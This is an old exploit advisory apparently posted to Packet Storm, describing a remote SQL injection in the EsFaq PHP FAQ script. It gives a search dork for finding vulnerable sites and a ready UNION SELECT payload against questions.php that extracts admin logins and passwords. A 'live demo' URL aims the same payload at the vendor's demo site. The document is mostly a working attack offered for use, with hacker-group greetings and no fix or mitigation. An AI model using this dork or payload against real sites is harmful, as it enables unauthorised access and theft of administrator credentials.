esfaq-sql.txt

2008-09-05T00:00:00
ID PACKETSTORM:69689
Type packetstorm
Reporter SuB-ZeRo
Modified 2008-09-05T00:00:00

Description

                                        
                                            `|___________________________________________________|  
|  
| EsFaq Remote Sql Injection Exploit  
|  
|___________________________________________________  
|---------------------SuB-ZeRo----------------------|  
|  
| Author: SuB-ZeRo  
|  
| Home : www.dz-security.com  
|  
| email: FbH@hotmail.com  
|  
|  
|___________________________________________________  
| |  
|  
| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5  
|  
| DorK : inurl:questions.php?idcat  
|___________________________________________________|  
Exploit:  
________  
  
www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--  
  
  
  
L!VE DEMO:  
_________  
http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--  
  
____________  
  
____________________________( Greetz )_________________________________  
|  
| All members of the Forum www.dz-security.com and www.no-exploit.com  
|  
| My friends : HiSoK4| x.CJP.x | bibi-infi | ThE BuTcHeR | charaf  
|   
| and all algeria hackers and all mouslimme  
|__________________________ramadan karim all mouslimme____________________________________________  
  
  
`